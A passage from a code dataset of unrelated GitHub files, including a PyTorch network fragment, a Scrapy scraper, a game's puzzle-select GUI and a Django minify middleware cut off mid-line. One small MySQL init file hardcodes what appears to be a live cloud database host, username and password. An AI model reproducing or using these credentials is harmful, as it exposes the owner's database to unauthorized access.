out_deconv1), 1)\n out_conv1_1 = self.conv1_1(concat1)\n\n out_deconv0 = self.deconv0(out_conv1_1)\n concat0 = torch.cat((out1, out_deconv0), 1)\n out_conv0_1 = self.conv0_1(concat0)\n mask0 = self.pred_mask0(out_conv0_1)\n prob0 = self.softmax(mask0)\n self.end_time = time.time()\n\n return prob0\n\n def weight_parameters(self):\n \n return [param for name, param in self.named_parameters() if 'weight' in name]\n\n def bias_parameters(self):\n \n return [param for name, param in self.named_parameters() if 'bias' in name]\n\n\ndef _spnet(arch, pretrained, **kwargs):\n model = SpixelNet(**kwargs)\n \n if pretrained:\n # if torch.cuda.is_available():\n # data = torch.load(model_paths[arch])\n # else: \n # data = torch.load(model_paths[arch], map_location=torch.device('cpu'))\n # \n # model.load_state_dict(data['state_dict'])\n pass\n \n return model\n\ndef spnet(pretrained=False):\n\n return _spnet('spnet', pretrained, batchNorm=False)\n\ndef spnet_bn(pretrained=False):\n\n return _spnet('spnet_bn', pretrained, batchNorm=True)\n\n","repo_name":"weikunhan/pytorch-benchmark-custom-models","sub_path":"custom_models/modified_spnet.py","file_name":"modified_spnet.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"28578867653","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndef f_x(x):\n return np.sin(x / 5) * np.exp(x / 10) + 5 * np.exp(-x / 2)\n\nA_1 = np.array([[1, 1], [1, 15]])\nb_1 = np.array([f_x(1), f_x(15)])\nnp.linalg.solve(A_1, b_1)\n\npoly_rank = 2\nA_2 = np.array([[1**n for n in range(poly_rank + 1)],\n [8**n for n in range(poly_rank + 1)],\n [15**n for n in range(poly_rank + 1)]])\nb_2 = np.array([f_x(1), f_x(8), f_x(15)])\nnp.linalg.solve(A_2, b_2)\n\npoly_rank = 3\nA_3 = np.array([[1**n for n in range(poly_rank + 1)],\n [4**n for n in range(poly_rank + 1)],\n [10**n for n in range(poly_rank + 1)],\n [15**n for n in range(poly_rank + 1)]])\nb_3 = np.array([f_x(1), f_x(4), f_x(10), f_x(15)])\nnp.linalg.solve(A_3, b_3).round(2)\n\n\ndef f(x, c):\n return c[0] + c[1]*x + c[2]*x**2 + c[3]*x**3\n\nc = [4.36264154, -1.29552587, 0.19333685, -0.00823565]\nx = np.arange(0, 16, 0.5)\nplt.plot(x, f_x(x), x, f(x, c))\nplt.xlabel(r'$x$'), plt.ylabel(r'%f(x)$')\nplt.grid(True)\nplt.show()\n","repo_name":"Tirren/data-analysis","sub_path":"submission-2.py","file_name":"submission-2.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71809712434","text":"import argparse\nimport json\n\nfrom scrapy import signals\nfrom scrapy.crawler import CrawlerProcess\nfrom scrapy.signalmanager import dispatcher\n\nfrom add_read_me_table import add_table_to_file\nfrom repo_metadata_scraper import MetadataSpider\nfrom repo_name_scraper import RepoNameSearchSpider\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-d', '--data_file', help='data file name', required=True)\n parser.add_argument('--discover', action='store_true', help='discover new repositories')\n parser.add_argument('--collect_metadata', help='scrape metadata for all or new repos', choices=['all', 'new'])\n parser.add_argument('-o', '--output_file', help='output file name')\n args = parser.parse_args()\n\n process = CrawlerProcess()\n\n if args.discover:\n f = open(args.data_file, 'a+')\n process.crawl(RepoNameSearchSpider, output_file=f)\n process.start()\n f.close()\n\n if args.collect_metadata is not None:\n urls = []\n results = []\n data = []\n\n def crawler_results(signal, sender, item, response, spider):\n results.append(item)\n # connect callback to dispatcher to get crawler results after all urls are consumed\n dispatcher.connect(crawler_results, signal=signals.item_passed)\n # read repo names from data file as required\n with open(args.data_file) as f:\n for line in f:\n jl = (json.loads(line))\n data.append(jl)\n # if collect_metadata is all, scrape all. Else scrape the ones that are\n # not scraped before (i.e. does not have a 'url')\n if 'name' in jl and (args.collect_metadata == 'all' or 'url' not in jl):\n urls.append('https://github.com/' + jl['name'])\n\n print('Running metadata scraper for', len(urls), 'urls')\n process.crawl(MetadataSpider, in_urls=urls)\n process.start()\n # after scraping ends, merge existing and new results\n # below section has O(n*n) complexity. If one of the DS are switched to a map, can be reduced to O(n)\n # at the current n (~500), it does not make a great difference\n for data_index in range(len(data)):\n for result in results:\n if data[data_index]['name'] == result['name']:\n data[data_index] = result\n break\n\n # overwrite data file with the new results\n with open(args.data_file, 'w') as f:\n f.seek(0)\n for d in data:\n f.write(json.dumps(d) + '\\n')\n f.truncate()\n\n if args.output_file is not None:\n add_table_to_file(args.data_file, args.output_file)\n","repo_name":"esg4aspl/Gherkin-Scenario-Collection-and-Analysis","sub_path":"scenario_scraper/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"2962476388","text":"import os, random\n\n# Game engine imports\nfrom core import *\n\n# Game imports\nfrom consts import *\nfrom helpers import *\nfrom gui.gui_elements import *\nfrom gui.mascot import *\n\n\nclass GUI_puzzle_select_container(GUI_element_network_container):\n \"\"\"\n All elements in puzzle selection screen live inside this thing.\n \"\"\"\n \n def __init__(self, game, parent = None):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.gui_init()\n self.z = Z_GUI_CONTAINERS\n self.width = self.game.settings['screen_width']\n self.height = self.game.settings['screen_height']\n self.alpha = .1\n self.colour = (1.0, .7, .5)\n\n self.title = Text(self.game.core.media.fonts['menu_titles'], 20, 10, TEXT_ALIGN_TOP_LEFT, str(self.game.manager.current_pack.name))\n self.title.z = Z_GUI_OBJECT_LEVEL_2\n self.title.colour = (0.95, 0.58, 0.09)\n self.title.shadow = 2\n self.title.shadow_colour = (0.7, 0.7, 0.7)\n\n self.author = None\n if self.game.manager.user_created_puzzles:\n self.author = Text(self.game.core.media.fonts['menu_subtitles'], 40, 55, TEXT_ALIGN_TOP_LEFT, \"by \" + str(self.game.manager.current_pack.author_name))\n self.author.z = Z_GUI_OBJECT_LEVEL_2\n self.author.colour = (0.45, 0.45, 0.45)\n self.author.shadow = 2\n self.author.shadow_colour = (0.9, 0.9, 0.9)\n\n GUI_puzzle_select_go_back(self.game, self)\n self.mascot_object = Mascot_Puzzle_Select(self.game) \n self.puzzle_name = Hover_text(\n self.game,\n self.game.settings['screen_width'] / 2,\n (self.game.settings['screen_height'] / 2) - 350\n )\n self.puzzle_best_time = Hover_text(\n self.game,\n self.game.settings['screen_width'] / 2,\n (self.game.settings['screen_height'] / 2) - 310)\n self.puzzle_size = Hover_text(\n self.game,\n (self.game.settings['screen_width'] / 2) + 200,\n (self.game.settings['screen_height'] / 2) - 310,\n \"puzzle_select_size\",\n 2.0\n )\n\n i = 0\n for puzzle_filename in self.game.manager.current_pack.order:\n GUI_puzzle_puzzle_item(self.game, self, puzzle_filename, self.game.manager.current_pack.puzzles[puzzle_filename], i)\n i += 1\n\n if self.game.manager.user_created_puzzles:\n GUI_puzzle_select_rating_star_container(self.game, self)\n if not self.game.manager.current_pack.uuid in self.game.player.packs_reported:\n self.report_button = GUI_puzzle_select_report(self.game, self)\n \n # Draw strategy data\n self.text_offset_x = 0.0\n self.text_offset_y = 0.0\n self.draw_strategy = \"balloons_background\"\n\n\n def Execute(self):\n self.update()\n self.puzzle_name.set_text(\"\")\n self.puzzle_best_time.set_text(\"\")\n self.puzzle_size.set_text(\"\")\n \n self.text_offset_x += 5.0\n self.text_offset_y -= 5.0\n\n\n def On_Exit(self):\n GUI_element.On_Exit(self)\n self.title.Kill()\n self.mascot_object.Kill()\n self.puzzle_name.Kill()\n self.puzzle_best_time.Kill()\n self.puzzle_size.Kill()\n if not self.author is None:\n self.author.Kill()\n\n \n\nclass GUI_puzzle_select_go_back(GUI_element_button):\n generic_button = False\n\n def __init__(self, game, parent = None):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.z = self.parent.z - 1\n self.image = self.game.core.media.gfx['gui_button_go_back']\n self.gui_init()\n self.x = 8\n self.y = self.game.settings['screen_height'] - self.image.height\n self.width = 128\n\n\n def mouse_left_up(self):\n GUI_element_button.mouse_left_up(self)\n if self.game.manager.user_created_puzzles:\n self.game.gui.fade_toggle(lambda: self.game.switch_game_state_to(GAME_STATE_SHARING, gui_state = GUI_STATE_SHARING_DOWNLOADED), speed = 20)\n else:\n self.game.gui.fade_toggle(lambda: self.game.switch_game_state_to(GAME_STATE_CATEGORY_SELECT), speed = 20)\n\n\n\nclass Hover_text(Process):\n def __init__(self, game, x, y, font = \"puzzle_select_hover_text\", x_pad = 20.0):\n Process.__init__(self)\n self.game = game\n self.x = x\n self.y = y\n self.z = Z_GUI_OBJECT_LEVEL_5\n self.x_pad = x_pad\n self.current_text = \"\"\n \n self.text = Text(\n self.game.core.media.fonts[font],\n self.x,\n self.y,\n TEXT_ALIGN_CENTER,\n self.current_text,\n )\n self.text.colour = (1.0, 1.0, 1.0)\n self.text.shadow = 2\n self.text.shadow_colour = (.3, .3, .3, .5)\n\n self.text.z = self.z - 1\n\n # Draw strategy data\n self.draw_strategy = \"\"\n self.draw_strategy_call_parent = False\n self.primitive_square_filled = True\n self.primitive_square_colour = (0.0, 0.0, 0.0, .3)\n \n\n def set_text(self, text):\n self.current_text = text\n self.text.text = self.current_text\n\n if not text == \"\":\n self.draw_strategy = \"primitive_square\"\n self.primitive_square_width = self.text.text_width + (self.x_pad * 2)\n self.primitive_square_height = self.text.text_height + 4.0\n self.primitive_square_x = self.x - (self.text.text_width/2) - self.x_pad\n self.primitive_square_y = self.y - (self.text.text_height/2) - 2.0\n else:\n self.draw_strategy = \"\"\n \n\n def On_Exit(self):\n self.text.Kill()\n\n\n\nclass GUI_puzzle_puzzle_item(GUI_element_button):\n generic_button = False\n \n def __init__(self, game, parent, puzzle_filename, puzzle_info, puzzle_num):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.puzzle_filename = puzzle_filename\n self.puzzle_info = puzzle_info\n self.puzzle_num = puzzle_num\n self.image = self.game.core.media.gfx['gui_puzzle_select_puzzle_box']\n self.gui_init()\n self.width = 128\n self.height = 128\n self.saved_icon = None\n self.solved_icon = None\n self.star_icon = None\n self.full_game_only_icon = None\n self.number_text = None\n self.monochrome_picture = None\n self.cleared = False\n \n column = self.puzzle_num % 5\n row = self.puzzle_num / 5\n puzzle_box_size = (870, 625)\n self.x = float((puzzle_box_size[0] / 5) * column) + self.width - (self.width / 2)\n self.y = 100.0 + float((puzzle_box_size[1] / 5) * row) + self.height - (self.height / 2) - 130\n\n if self.game.settings['screen_width'] > puzzle_box_size[0]:\n self.x += (self.game.settings['screen_width'] - puzzle_box_size[0]) / 2\n if self.game.settings['screen_height'] > puzzle_box_size[1]:\n self.y += (self.game.settings['screen_height'] - puzzle_box_size[1]) / 2\n \n self.z = Z_GUI_OBJECT_LEVEL_4\n\n if DEMO:\n puzzle_file_path = os.path.join(self.game.core.path_game_pack_directory, self.game.manager.current_puzzle_pack, self.puzzle_filename)\n if not os.path.exists(puzzle_file_path):\n self.disabled = True\n self.full_game_only_icon = Full_Game_Only_Notice(self.game, self)\n return\n\n if self.game.manager.current_pack.uuid in self.game.player.cleared_puzzles and self.puzzle_filename in self.game.player.cleared_puzzles[self.game.manager.current_pack.uuid]:\n self.cleared = True\n\n self.number_text = Text(\n self.game.core.media.fonts['puzzle_select_number'],\n self.x,\n self.y + 5,\n TEXT_ALIGN_TOP_RIGHT,\n str(self.puzzle_num + 1)\n )\n self.number_text.z = self.z\n self.number_text.colour = (0.0, 0.0, 0.0) if self.cleared else (0.3, 0.3, 0.3)\n self.number_text.shadow = 2\n self.number_text.shadow_colour = (.5, .5, .5, .5)\n \n if self.cleared:\n path_dir = self.game.core.path_user_pack_directory if self.game.manager.user_created_puzzles else self.game.core.path_game_pack_directory\n\n self.monochrome_picture = GUI_puzzle_puzzle_item_picture(\n self.game,\n self,\n self.x + (self.width / 2),\n self.y + (self.height / 2),\n puzzle_path = os.path.join(path_dir, self.game.manager.current_puzzle_pack, self.puzzle_filename),\n in_colour = False,\n fade_in_time = None\n )\n self.coloured_picture = GUI_puzzle_puzzle_item_picture(\n self.game,\n self,\n self.x + (self.width / 2),\n self.y + (self.height / 2),\n puzzle_path = os.path.join(path_dir, self.game.manager.current_puzzle_pack, self.puzzle_filename),\n in_colour = True,\n fade_in_time = None\n )\n self.coloured_picture.alpha = 0.0\n else:\n self.monochrome_picture = GUI_puzzle_puzzle_item_picture_unsolved(self.game, self)\n \n if self.game.manager.user_created_puzzles:\n save_path = self.game.core.path_saves_user_directory\n else:\n save_path = self.game.core.path_saves_game_directory\n\n if os.path.exists(os.path.join(save_path, self.game.manager.current_puzzle_pack + \"_\" + self.puzzle_filename + FILE_SAVES_EXTENSION)):\n self.saved_icon = GUI_puzzle_puzzle_item_saved_icon(self.game, self)\n \n if self.cleared:\n if self.game.manager.current_pack.uuid in self.game.player.puzzle_scores and self.puzzle_filename in self.game.player.puzzle_scores[self.game.manager.current_pack.uuid]:\n if self.game.manager.current_pack.freemode:\n seconds = int(self.game.player.puzzle_scores[self.game.manager.current_pack.uuid][self.puzzle_filename][0] / 60)\n if int(seconds / 60) <= 30:\n self.star_icon = GUI_puzzle_puzzle_item_star_icon(self.game, self)\n else:\n if self.game.player.puzzle_scores[self.game.manager.current_pack.uuid][self.puzzle_filename][1] == 4:\n self.star_icon = GUI_puzzle_puzzle_item_star_icon(self.game, self)\n if self.star_icon is None:\n self.solved_icon = GUI_puzzle_puzzle_item_solved_icon(self.game, self)\n\n\n def Execute(self):\n self.image_sequence = 1\n GUI_element_button.Execute(self)\n \n\n def mouse_left_down(self):\n if self.disabled:\n return\n self.image_sequence = 2\n if self.cleared:\n self.monochrome_picture.press()\n self.coloured_picture.press()\n else:\n self.monochrome_picture.press()\n \n\n def mouse_left_up(self):\n if self.disabled:\n return\n GUI_element_button.mouse_left_up(self)\n self.game.manager.current_puzzle_file = self.puzzle_filename\n if self.saved_icon:\n self.game.manager.load_puzzle_state_from = self.game.manager.current_puzzle_pack + \"_\" + self.puzzle_filename + FILE_SAVES_EXTENSION\n self.game.gui.fade_toggle(lambda: self.game.switch_game_state_to(GAME_STATE_PUZZLE), speed = 40, stop_music = True)\n if not self.cleared:\n self.monochrome_picture.un_press()\n\n \n def mouse_not_over(self):\n if self.disabled:\n return\n if self.cleared:\n if self.coloured_picture.alpha > 0.0:\n self.coloured_picture.alpha -= .1\n else:\n self.monochrome_picture.un_press()\n self.monochrome_picture.stop_pulse()\n self.hover_sound = False\n\n \n def mouse_over(self):\n if self.disabled:\n return\n if self.play_sound and not self.hover_sound:\n self.game.core.media.sfx['button_hover'].play(0)\n self.hover_sound = True\n \n if self.cleared: \n if self.coloured_picture.alpha < 1.0:\n self.coloured_picture.alpha += .1\n \n self.parent.puzzle_name.set_text(str(self.puzzle_info[0]))\n\n if self.game.manager.current_pack.uuid in self.game.player.puzzle_scores and self.puzzle_filename in self.game.player.puzzle_scores[self.game.manager.current_pack.uuid]:\n seconds = int(self.game.player.puzzle_scores[self.game.manager.current_pack.uuid][self.puzzle_filename][0] / 60)\n minutes = int(seconds / 60)\n hours = int(minutes / 60)\n seconds = seconds - (minutes * 60)\n minutes = minutes - (hours * 60)\n time_text = str(hours).rjust(2, \"0\") + \":\" + str(minutes).rjust(2, \"0\") + \":\" + str(seconds).rjust(2, \"0\")\n self.parent.puzzle_best_time.set_text(\"Best time: \" + str(time_text))\n else:\n self.parent.puzzle_best_time.set_text(\"Best time: 00:00:00\")\n else:\n self.parent.puzzle_name.set_text(\"? ? ? ?\")\n self.parent.puzzle_best_time.set_text(\"Best time: 00:00:00\")\n self.monochrome_picture.pulse()\n \n self.parent.puzzle_size.set_text(str(self.puzzle_info[1]) + \"x\" + str(self.puzzle_info[2]))\n \n\n def On_Exit(self):\n GUI_element_button.On_Exit(self)\n if self.number_text:\n self.number_text.Kill()\n if self.monochrome_picture:\n self.monochrome_picture.Kill()\n if self.full_game_only_icon:\n self.full_game_only_icon.Kill()\n if self.saved_icon:\n self.saved_icon.Kill()\n if self.cleared:\n self.coloured_picture.Kill()\n if self.solved_icon:\n self.solved_icon.Kill() \n if self.star_icon:\n self.star_icon.Kill()\n\n\nclass Full_Game_Only_Notice(Process):\n def __init__(self, game, parent):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.image = self.game.core.media.gfx['full_game_stamp']\n self.z = self.parent.z -1\n self.x = self.parent.x + 100\n self.y = self.parent.y + 100\n self.scale = .7\n\n\n\nclass GUI_puzzle_puzzle_item_picture_unsolved(Process):\n def __init__(self, game, parent):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.image = self.game.core.media.gfx['gui_puzzle_image_unsolved']\n self.set_position()\n self.width = self.image.width \n self.height = self.image.height\n self.z = Z_GUI_OBJECT_LEVEL_5\n self.dir = 1\n\n\n def pulse(self):\n if self.dir == 1:\n if self.scale > .8:\n self.scale -= .01\n else:\n self.scale = .8\n self.dir = 2\n else:\n if self.scale < 1.0:\n self.scale += .01\n else:\n self.scale = 1.0\n self.dir = 1\n \n\n def stop_pulse(self):\n if self.scale < 1.0:\n self.scale += .01\n else:\n self.scale = 1.0\n self.dir = 1\n\n\n def press(self):\n self.set_position(True)\n\n\n def un_press(self):\n self.set_position()\n \n \n def set_position(self, shift = False):\n self.x = self.parent.x + (self.parent.width / 2)\n self.y = self.parent.y + (self.parent.height / 2)\n if shift:\n self.x += 2\n self.y += 2\n\n\n def get_screen_draw_position(self):\n return (self.x - ((self.image.width * self.scale) / 2), self.y - ((self.image.height * self.scale) / 2))\n\n\n\nclass GUI_puzzle_puzzle_item_picture(Puzzle_image):\n def Execute(self):\n self.set_position()\n Puzzle_image.Execute(self)\n\n\n def gui_init(self):\n Puzzle_image.gui_init(self)\n #self.draw_strategy = \"gui_designer_monochrome_puzzle_image\" \n \n def set_position_z_scale(self, x, y): \n self.z = Z_GUI_OBJECT_LEVEL_5\n if self.in_colour:\n self.z -= 1\n scale_start = self.height if self.height > self.width else self.width\n self.scale = .01 * ((84.0 / scale_start) * 100)\n self.start_x = x\n self.start_y = y\n self.set_position()\n \n\n def set_position(self, shift = False):\n self.x = self.start_x - ((self.width * self.scale) / 2)\n self.y = self.start_y - ((self.height * self.scale) / 2)\n if shift:\n self.x += 2\n self.y += 2\n\n \n def press(self):\n self.set_position(True)\n \n\n\nclass GUI_puzzle_puzzle_item_saved_icon(Process):\n def __init__(self, game, parent):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.x = self.parent.x - 40 + (self.parent.width / 2)\n self.y = self.parent.y + 45 + (self.parent.height / 2)\n self.z = Z_GUI_OBJECT_LEVEL_6\n self.image = self.game.core.media.gfx['gui_puzzle_select_saved_icon']\n self.rotation = 16\n\n\n\nclass GUI_puzzle_puzzle_item_solved_icon(Process):\n def __init__(self, game, parent):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.x = self.parent.x + 40 + (self.parent.width / 2)\n self.y = self.parent.y + 45 + (self.parent.height / 2)\n self.z = Z_GUI_OBJECT_LEVEL_6\n self.image = self.game.core.media.gfx['gui_puzzle_select_solved_icon']\n\n\n\nclass GUI_puzzle_puzzle_item_star_icon(Process):\n def __init__(self, game, parent):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.x = self.parent.x + 40 + (self.parent.width / 2)\n self.y = self.parent.y + 45 + (self.parent.height / 2)\n self.z = Z_GUI_OBJECT_LEVEL_6\n self.image = self.game.core.media.gfx['gui_puzzle_select_star_icon']\n\n\n\n\nclass GUI_puzzle_select_rating_star_container(GUI_element):\n \n def __init__(self, game, parent):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n\n self.x = self.game.settings['screen_width'] - 225\n self.y = self.game.settings['screen_height'] - 130\n self.z = Z_GUI_OBJECT_LEVEL_5\n\n self.text = Text(\n self.game.core.media.fonts[\"puzzle_select_rate_pack_text\"],\n self.x + 15,\n self.y - 35,\n TEXT_ALIGN_TOP_LEFT,\n \"Rate this pack!\"\n )\n self.text.z = Z_GUI_OBJECT_LEVEL_6\n self.text.colour = (.4, .4, .4)\n self.text.shadow = 2\n self.text.shadow_colour = (1.0, 1.0, 1.0, .5)\n \n self.width = 42 * 5\n self.height = 40\n #self.x = self.text.text_width + 32\n self.gui_init()\n\n self.hovering = False\n\n self.stars = []\n for i in range(5):\n self.stars.append(GUI_puzzle_select_rating_star_star(self.game, self, i))\n\n\n def mouse_over(self):\n self.hovering = True\n\n\n def mouse_out(self):\n self.hovering = False\n\n\n def On_Exit(self):\n GUI_element.On_Exit(self)\n self.text.Kill()\n \n\n\nclass GUI_puzzle_select_rating_star_star(GUI_element):\n \n def __init__(self, game, parent, num):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.num = num\n self.image = self.game.core.media.gfx['gui_puzzle_select_rating_star']\n self.x = self.parent.x + (42 * num)\n self.y = self.parent.y\n self.width = 40\n self.height = 40\n self.z = Z_GUI_OBJECT_LEVEL_6\n self.gui_init()\n\n\n def update(self):\n if self.parent.hovering:\n return\n\n self.image_sequence = 1\n \n if self.game.manager.current_pack.uuid in self.game.player.pack_ratings:\n if self.num < self.game.player.pack_ratings[self.game.manager.current_pack.uuid]:\n self.image_sequence = 2\n\n\n def mouse_over(self):\n self.image_sequence = 2\n for i in range(5):\n self.parent.stars[i].image_sequence = 2 if i <= self.num else 1\n\n\n def rate(self, response):\n self.game.rate_pack(self.game.manager.current_pack.uuid, self.num + 1)\n\n\n def mouse_left_up(self):\n data = {\n 'pack' : self.game.manager.current_pack.uuid,\n 'rater' : self.game.author_id,\n 'rating' : self.num + 1\n }\n self.parent.parent.make_request_to_server(\"rate_pack/\", data, self.rate, task_text = \"Rating pack\")\n \n\n\nclass GUI_puzzle_select_report(GUI_element_button):\n generic_button = False\n \n def __init__(self, game, parent):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.x = self.game.settings['screen_width'] - 180\n self.y = self.game.settings['screen_height'] - 70\n self.z = Z_GUI_OBJECT_LEVEL_2\n self.image = self.game.core.media.gfx['gui_puzzle_select_button_report']\n self.gui_init()\n\n\n def mouse_left_up(self):\n GUI_element_button.mouse_left_up(self)\n GUI_puzzle_select_report_dialog(self.game, self.parent)\n\n\n\nclass GUI_puzzle_select_report_dialog(GUI_element_window):\n title = \"Report Puzzle\"\n height = 195\n width = 490\n objs = {}\n\n def __init__(self, game, parent = None):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.gui_init()\n\n \n def gui_init(self):\n self.z = Z_GUI_OBJECT_LEVEL_8\n self.x = (self.game.settings['screen_width'] / 2) - (self.width / 2)\n self.y = (self.game.settings['screen_height'] / 2) - (self.height / 2)\n GUI_element_window.gui_init(self)\n\n self.objs = {}\n y = 0\n for text in [\"Using this box you can report a puzzle as inappropriate.\", \"Select the reason for the report and submit it.\", \"It will be dealt with as soon as possible.\"]:\n txt = Text(self.game.core.media.fonts['window_text'], self.x + 28, self.y + 45 + y, TEXT_ALIGN_TOP_LEFT, text)\n txt.z = self.z - 2\n txt.colour = (0.3,0.3,0.3)\n self.objs['text_' + str(y)] = txt\n y += txt.text_height + 2\n\n GUI_puzzle_select_report_dialog_submit_button(self.game, self)\n GUI_puzzle_select_report_dialog_cancel_button(self.game, self)\n\n txt = Text(self.game.core.media.fonts['window_text'], self.x + 30, self.y + 117, TEXT_ALIGN_TOP_LEFT, \"Report type: \")\n txt.z = self.z - 2\n txt.colour = (0.3, 0.3, 0.3)\n self.objs['text_dropdown'] = txt \n self.report_type = GUI_puzzle_select_report_type_dropdown(self.game, self)\n \n self.game.gui.block_gui_keyboard_input = True\n self.x = 0\n self.y = 0\n self.width = self.game.settings['screen_width']\n self.height = self.game.settings['screen_height']\n\n self.draw_strategy = \"primitive_square\"\n self.draw_strategy_call_parent = False\n self.primitive_square_width = self.x + self.width\n self.primitive_square_height = self.y + self.height\n self.primitive_square_x = 0.0\n self.primitive_square_y = 0.0\n self.primitive_square_colour = (0.0, 0.0, 0.0, .4)\n\n\n def report_pack(self, response):\n self.parent.report_button.Kill()\n self.parent.report_button = None\n GUI_element_dialog_box(self.game, self.parent, \"Pack reported\", [\"This pack has been reported to Stompy Blondie\", \"and will be investigated as soon as possible.\", \"Thank you for helping make PixelPics better!\"])\n self.Kill()\n \n\n def On_Exit(self):\n GUI_element_window.On_Exit(self)\n self.game.gui.block_gui_keyboard_input = False\n for x in self.objs:\n self.objs[x].Kill()\n\n\n\nclass GUI_puzzle_select_report_type_dropdown(GUI_element_dropdown):\n display_width = 300\n\n dropdown_options = [\n {'text' : \"Inappropriate or offensive content\", 'data' : 'offensive'},\n {'text' : \"Pack is broken in some way\", 'data' : 'broken'},\n {'text' : \"Misleading pack name\", 'data' : 'wrong'},\n {'text' : \"Other\", 'data' : 'other'}\n ]\n\n selected_item = 0\n \n def __init__(self, game, parent = None):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.display_x = self.parent.x + 140\n self.display_y = self.parent.y + 110\n self.display_z = self.parent.z - 2\n self.gui_init()\n\n\n\nclass GUI_puzzle_select_report_dialog_submit_button(GUI_element_button):\n generic_button = True\n generic_button_text = \"Send\"\n\n def __init__(self, game, parent = None):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.z = self.parent.z - 2\n self.x = self.parent.x + (self.parent.width / 2) - (self.width) - 70\n self.y = self.parent.y + 150\n self.gui_init()\n\n\n def mouse_left_up(self):\n GUI_element_button.mouse_left_up(self)\n data = {\n 'pack' : self.game.manager.current_pack.uuid,\n 'reporter' : self.game.author_id,\n 'report_type' : self.parent.report_type.dropdown_options[self.parent.report_type.selected_item]['data'] \n }\n self.parent.parent.make_request_to_server(\"report_pack/\", data, self.parent.report_pack, task_text = \"Reporting pack\")\n\n\n\nclass GUI_puzzle_select_report_dialog_cancel_button(GUI_element_button):\n generic_button = True\n generic_button_text = \"Cancel\"\n\n def __init__(self, game, parent = None):\n Process.__init__(self)\n self.game = game\n self.parent = parent\n self.z = self.parent.z - 2\n self.x = self.parent.x + (self.parent.width / 2) + 10\n self.y = self.parent.y + 150\n self.gui_init()\n\n\n def mouse_left_up(self):\n GUI_element_button.mouse_left_up(self)\n self.parent.Kill()\n","repo_name":"Fiona/PixelPicsCPP","sub_path":"logic/gui/puzzle_select.py","file_name":"puzzle_select.py","file_ext":"py","file_size_in_byte":26243,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"23983142374","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'HeZhen'\n\nfrom ics.utils.mysql.mysqldb import MySQLUtil\n\nclass MySQLInit(MySQLUtil):\n\n\n def __init__(self):\n self.inited = False\n self.display = True\n self.init('rm-bp11towre3n815e78o.mysql.rds.aliyuncs.com', 'gouchao', 'Gouchao!2018', 'gsxt_test', 3306, min_connections=3)\n\n ","repo_name":"stonegithubs/spiders","sub_path":"project/spiders/ics/task/gsxt/etl/mysql.py","file_name":"mysql.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"35668932930","text":"\"\"\"Django middleware.\"\"\"\nfrom __future__ import annotations\nimport logging\nimport re\nimport typing\n\nfrom django.conf import settings\nfrom django.core.cache import InvalidCacheBackendError, caches\nfrom django.core.cache.backends.base import BaseCache\nfrom django.http import HttpRequest, HttpResponse\n\nfrom .base import html_minify\n\n\nhash_func: typing.Callable\ntry:\n import xxhash\n\n hash_func = xxhash.xxh64\nexcept ImportError:\n import hashlib\n\n hash_func = hashlib.md5\n\n\nLOGGER_INST: logging.Logger = logging.getLogger(__file__)\nCACHE_PREFIX: str = \"hmin-\"\nMINIFICATION_ENABLED: bool = getattr(settings, \"HTML_MINIFY\", not settings.DEBUG)\nREMOVE_COMMENTS: bool = getattr(settings, \"HMIN_REMOVE_COMMENTS\", True)\nUSE_CACHE: bool = getattr(settings, \"HMIN_USE_CACHE\", True)\nTIMEOUT: bool = getattr(settings, \"HMIN_CACHE_TIMEOUT\", 3600)\nEXCLUDE_PAGES: list = []\n\n\n# get cache provider, or disable caching\nif USE_CACHE:\n try:\n cache_instance: BaseCache = caches[getattr(settings, \"HMIN_CACHE_BACKEND\", \"default\")]\n except (InvalidCacheBackendError, NameError):\n USE_CACHE = False\n\n\n# process exclude pages\nif hasattr(settings, \"HMIN_EXCLUDE\"):\n EXCLUDE_PAGES = [re.compile(url_pattern) for url_pattern in settings.HMIN_EXCLUDE]\n\n\n# Middlewares starts here\nclass _BasicMiddleware:\n \"\"\"Basic middleware mixin.\"\"\"\n\n def __init__(self, get_response: typing.Callable) -> None:\n self.get_response: typing.Callable = get_response\n\n\nclass MarkMiddleware(_BasicMiddleware):\n \"\"\"This middleware suposed to be first.\n\n It mean to be used with cache middlewares in django.\n \"\"\"\n\n def __call__(self, request: HttpRequest) -> HttpResponse:\n \"\"\"Allow minification flag.\"\"\"\n request.need_to_minify = True\n return self.get_response(request)\n\n\nclass MinMiddleware(_BasicMiddleware):\n \"\"\"Minification middleware itself.\"\"\"\n\n def __call__(self, request: HttpRequest) -> HttpResponse:\n \"\"\"Minification goes here.\"\"\"\n response: HttpResponse = self.get_response(request)\n\n # prevent from minifying cached pages\n if not MINIFICATION_ENABLED or not hasattr(request, \"need_to_minify\") or not request.need_to_minify:\n return response\n\n # prevent from minifying excluded pages\n if EXCLUDE_PAGES:\n current_path: str = request.path.lstrip(\"/\")\n for one_regex in EXCLUDE_PAGES:\n if one_regex.match(current_path):\n return response\n\n if \"Content-Type\" in response and \"text/html\" in 